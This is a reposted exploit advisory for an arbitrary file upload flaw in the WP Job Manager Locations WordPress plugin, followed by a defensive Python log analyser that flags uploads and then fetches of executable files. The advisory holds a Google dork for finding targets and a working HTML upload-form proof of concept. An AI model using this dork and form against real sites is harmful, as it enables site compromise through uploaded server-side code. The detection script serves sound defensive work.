WordPress Plugins WP Job Manager Locations - Arbitrary File Upload

CVE: CVE-2021-24604
Category: CWE-434
Price: Not specified
Severity: High
Author: bouhelal
Risk: High
Exploitation Type: Remote
Date: 2017-06-04
CPE: cpe:/a:wordpress:wp_job_manager
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060029

Below is a copy:

# Exploit Title: WordPress Plugins WP Job Manager Locations - Arbitrary File Upload
# Google Dork: Index of /wp-content/plugins/wp-job-manager-locations
# Date: 4 June 2017
# Exploit Author: AlHikam AM
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://id.wordpress.org/plugins/wp-job-manager-locations/
# Tested on: Windows 7

1. Google Dorking
2. Exploit the websites
https://localhost/jm-ajax/upload_file/
3. Vulnerability?
FormCraft {"files":[]}

4. PoC :
<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

5. File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/YYYY/MM/your-files.jpg
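As an added defensive example (not part of the advisory above and not code from the plugin), the following Python script parses constructed web-server access-log lines and flags clients that POST to the upload endpoint named in the advisory and then fetch a server-executable file from the job-manager-uploads directory. The combined log format, the sample log lines, the client addresses and the list of executable extensions are assumptions; the endpoint and storage paths are the ones the advisory gives. It goes slightly beyond the advisory by also checking every dotted component of the file name, so a stored name such as file.php.jpg is reported as well.

```python
import re
from urllib.parse import urlsplit

# Endpoint and storage location as given in the advisory above.
UPLOAD_ENDPOINT = "/jm-ajax/upload_file/"
UPLOAD_DIR_PREFIX = "/wp-content/uploads/job-manager-uploads/"
# Assumed list of extensions a PHP web server may execute; stored uploads should never carry them.
EXEC_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Constructed sample lines in Apache/Nginx "combined" format (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2017:10:00:01 +0000] "POST /jm-ajax/upload_file/ HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2017:10:00:03 +0000] "GET /wp-content/uploads/job-manager-uploads/files/2017/06/test.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2017:10:05:00 +0000] "POST /jm-ajax/upload_file/ HTTP/1.1" 200 45 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2017:10:05:02 +0000] "GET /wp-content/uploads/job-manager-uploads/files/2017/06/resume.pdf HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.0.2.9 - - [04/Jun/2017:10:07:00 +0000] "GET /wp-content/uploads/job-manager-uploads/files/2017/06/photo.jpg HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Assumed input format: the common "combined" access-log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def has_executable_extension(path):
    """True if any dotted component of the file name is a server-executable extension.

    Checking every component (not only the last one) also reports names such as
    file.php.jpg, which some mis-configured Apache handler setups execute.
    """
    name = path.rsplit("/", 1)[-1].lower()
    return any(part in EXEC_EXTENSIONS for part in name.split(".")[1:])


def analyze(log_text):
    """Correlate POSTs to the upload endpoint with fetches of executable files from the upload dir."""
    upload_posts = []        # (ip, timestamp) for every POST to the upload endpoint
    suspicious_fetches = []  # (ip, path) for every request for an executable file under the upload dir
    posters = set()          # clients that have POSTed to the endpoint so far
    alerts = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT:
            upload_posts.append((rec["ip"], rec["ts"]))
            posters.add(rec["ip"])
        elif rec["path"].startswith(UPLOAD_DIR_PREFIX) and has_executable_extension(rec["path"]):
            suspicious_fetches.append((rec["ip"], rec["path"]))
            # Highest confidence when the same client uploaded earlier and now fetches the file.
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "uploaded_earlier": rec["ip"] in posters,
            })
    return {"upload_posts": upload_posts, "suspicious_fetches": suspicious_fetches, "alerts": alerts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print(f"{len(result['upload_posts'])} upload POST(s) seen")
    for alert in result["alerts"]:
        print("ALERT:", alert)
```

Run it against a real access log by reading the file and passing its text to analyze(); POSTs to the endpoint alone are only informational, since legitimate job applications use the same path, while any request for a file with an executable extension under the upload directory is worth a ticket whether or not the upload was observed.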

Great : Indonesian Freedom Security - Base POM303
